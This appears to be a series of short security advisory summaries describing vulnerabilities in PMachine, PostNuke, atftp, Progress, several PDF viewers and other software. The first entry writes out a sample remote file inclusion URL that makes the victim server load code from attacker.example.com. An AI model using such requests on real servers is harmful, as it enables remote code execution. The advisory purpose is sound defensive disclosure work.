It has been reported that PMachine does not properly handle include files under some circumstances. Because of this, an attacker may be able to remotely execute commands. An attacker can send a malicious request to the vulnerable server, such as http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=.txt with http://attacker.example.com/config.txt or http://victim.example.com/pm/lib.inc.php?pm_path=http://attacker.example.com/&sfx=/badcode.txt with http://attacker.example.com/config/badcode.txt, which can allow the attacker to execute arbitrary code on the vulnerable server.
It has been reported that jserver may allow an attacker to corrupt arbitrary files. Due to this, an attacker may be able to overwrite system files, and potentially gain elevated privileges.
It has been reported that Progress database does not properly handle untrusted input when opening shared libraries. Specifically, the dlopen() function used by several Progress utilities checks the user's PATH environment variable when including shared object libraries. If any shared objects are found, Progress will load and execute them. Due to this, an attacker may be able to gain unauthorized privileges. Any library code loaded will execute with elevated privileges.
Infinity CGI Exploit Scanner is prone to a remote command execution vulnerability. This is due to insufficient sanitization of input supplied via URI parameters. Exploitation could allow for execution of commands with the privileges of the web server process.
A vulnerability has been reported for multiple PDF viewers for Unix variant operating systems. The problem is said to occur when hyperlinks have been enabled within the viewer. Allegedly, by placing a specially formatted hyperlink within a PDF file it is possible to execute arbitrary shell commands when a user clicks the link. This is due to the PDF viewer invoking an external application, via a call to 'sh -c', to handle the request. Successful exploitation of this vulnerability could potentially allow an attacker to execute arbitrary commands on a target system with the privileges of the user invoking the PDF document.
Infinity CGI Exploit Scanner is reported to be prone to a cross-site scripting vulnerability. An attacker could exploit this issue to creating a malicious link to a site hosting the software that contains hostile HTML and script code. If this link is visited by a web user, the attacker-supplied code could be interpreted in their browser.
The Methodus 3 Web Server component is prone to a file disclosure vulnerability. It is possible for remote attackers to retrieve resources outside of the web root directory via directory traversal attacks. This could potentially be exploited to gain access to sensitive files on a system hosting the vulnerable software.
atftp is prone to a locally exploitable buffer overflow condition. This issue is due to insufficient bounds checking performed on input supplied to the command line parameter (-t) for 'timeout'. Local attackers may exploit this condition to execute arbitrary instructions. It should be noted that although this vulnerability has been reported to affect atftp version 0.7cvs, other versions might also be vulnerable.
The PostNuke 'user.php' script does not sufficiently sanitize data supplied via URI parameters, making it prone to cross-site scripting attacks. This could allow for execution of hostile HTML and script code in the web client of a user who visits a web page that contains the malicious code. Exploitation could allow for theft of cookie-based authentication credentials. Other attacks are also possible.
Sphera HostingDirector VDS Control Panel has been reported prone to several cross-site scripting attacks. The vulnerabilities exist due to insufficient sanitization of user-supplied input for certain URI parameters. Successful exploitation could permit theft of cookie-based authentication credentials from legitimate users of the HostingDirector Control Panel.
Services By CQR